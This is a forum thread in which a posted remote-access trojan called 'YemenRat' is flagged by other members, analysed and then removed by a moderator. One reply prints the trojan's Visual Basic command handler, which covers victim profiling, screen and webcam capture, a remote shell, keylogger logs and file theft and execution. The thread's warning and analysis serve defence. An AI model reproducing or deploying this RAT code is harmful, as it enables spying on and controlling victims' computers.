YemenRat open source

**Dr.X4vb** · Sep 8th, 2020, 02:23 PM

password : 152

**Bobbles** · Sep 10th, 2020, 01:40 AM

Is there a prize for the first person to guess (and post) what it does ?

**Thierry69** · Sep 10th, 2020, 02:30 AM

I opened the project in notepad (not VB), and I can't trust the project.

I suggest to not open it and run it in VB

**Eduardo-** · Sep 10th, 2020, 03:19 AM

Client\frmOptions.frm:

Code:

MkDir (App.Path & "\" & "Victims")

When you read "for educational purposes", suspect.

**wqweto** · Sep 10th, 2020, 04:29 AM

I extracted it w/ no warnings from Windows Defender and these are all the commands the server supports

Code:

        Case "|REQUESTID|"
            'PW = sData(2)
            Call SendData("|INFO|" & Chr(0) & Info.VictimName & Chr(0) & "0.0.0.0" & Chr(0) & _
            Environ("username") & Chr(0) & Environ("computername") & Chr(0) & _
            GetWindowsVersion & Chr(0) & GetMemory & Chr(0) & GetCPU & Chr(0) & _
            Admin & Chr(0) & GetSecurity & Chr(0) & GetCountry & Chr(0) & _
            GetActiveWindow)
            
        Case "|SHOW COMMAND|"
            Call SendData("|SHOW COMMAND|")
            
        Case "|GETDRIVES|"
            Call SendData("|GETDRIVES|" & Chr(0) & GetDrives)
        
        Case "|SCREEN CAPTURE|"
            frmMain.Pic.Height = sData(2)
            frmMain.Pic.Width = sData(3)
            
            If sData(4) > 100 Then
                sData(4) = 30
            End If
            
            Call ScreenCapture(sData(4))
            Call SendPoto(Environ("temp") & "\" & frmMain.hwnd & "SC.Yem")
        
        Case "|BROWSING|"
            Data = EnumFiles(sData(2))
            Call SendData("|BROWSING|" & Chr(0) & Data)
            
        Case "|GET PROCESS|"
            Call SendData("|GET PROCESS|" & Chr(0) & GetProcess)
            
        Case "|KILL PROCESS|"
            Call KillProcess(sData(2))
            
        Case "|GET WEBCAM DRIVE|"
            Call SendData("|GET WEBCAM DRIVE|" & Chr(0) & GetWebCamDrives)
            
        Case "|WEBCAM CAPTURE|"
            frmMain.FsR.Enabled = False
            frmMain.Pic.Height = 4000
            frmMain.Pic.Width = 5000
            
            If sData(2) > 100 Then
                sData(2) = 30
            End If
            
            If WebCamConnecter Then
                If WebCamCapturer Then
                    SaveJPG frmMain.Pic.Image, (Environ("temp") & "\" & frmMain.hwnd & "WC.Yem"), sData(2)
                    Call SendWebcam(Environ("temp") & "\" & frmMain.hwnd & "WC.Yem")
                Else
                    GoTo CamErr:
                End If
            Else
                GoTo CamErr:
            End If
            
            Exit Sub
CamErr: Call SendData("|WEBCAM ERROR|")
            
        Case "|PING|"
            NoSignle = Timer
            Call SendData("|PING|" & Chr(0) & GetActiveWindow)
            
        Case "|REOMTE SHELL|"
            Call SendData("|REOMTE SHELL|" & Chr(0) & ExecDOS(sData(2)))
            
        Case "|NEW DIRECTORY|"
            Create_Folder sData(2), sData(3): DoEvents: Data = EnumFiles(sData(2))
            Call SendData("|BROWSING|" & Chr(0) & Data)
            
        Case "|DOWNLOAD FILE|"
            Call SendFile(sData(2))
            
        Case "|GET LIVE KEYS|"
            Live_Keys = True
            
        Case "|GET LOG|"
            Call SendLog(App.Path & "\" & "Klg.Yem")
            
        Case "|DELETE LOG|"
            SetAttr App.Path & "\" & "Klg.Yem", vbNormal
            Kill App.Path & "\" & "Klg.Yem"
            
        Case "|SIZE LOG|"
            Call SendData("|SIZE LOG|" & Chr(0) & FileLen(App.Path & "\" & "Klg.Yem"))
            
        Case "|RUN FILE|"
            ShellExecute 0, "open", sData(2), 0, 0, 2
            
        Case "|DELETE FILE|"
            Delete_File sData(2), sData(3): DoEvents: Data = EnumFiles(sData(2))
            Call SendData("|BROWSING|" & Chr(0) & Data)
            
        Case "|RENAME FILE|"
            ReName_File sData(2), sData(3), sData(4): DoEvents: Data = EnumFiles(sData(2))
            Call SendData("|BROWSING|" & Chr(0) & Data)
        
        Case "|SEND FILE|"
            Dim RFnum As Integer
            '===================
            sData = Split(oData, Chr(0), 5)
            RFnum = FreeFile
            Open sData(2) & sData(3) For Binary As #RFnum
            Put #RFnum, LOF(RFnum) + 1, sData(4)
            Close #RFnum
            Call SendData("|NEXT PART|")
            
        Case "|UNLOAD|"
            Call Reset
            
        Case "|CHECK FILE SIZE|"
            Call Get_File_Size(sData(2), sData(3))
            
        Case "|RESUME DOWNLOAD|"
            Call SendFile(sData(2), sData(3))
            
        Case "|GET INFO|"
            Call Information
            
        Case "|CLOSE SERVER|"

Perfectly aimed at indimidating victims with screen capture, password key-logging, cam pictures and leaching files.

cheers,
</wqw>

**FunkyDexter** · Sep 10th, 2020, 08:12 AM

Have deleted it and banned the user. Thanks for bringing it to our attention.

Thread: YemenRat open source

Thread Tools

Display

YemenRat open source

Re: YemenRat open source

Re: YemenRat open source

Re: YemenRat open source

Re: YemenRat open source

Re: YemenRat open source

Posting Permissions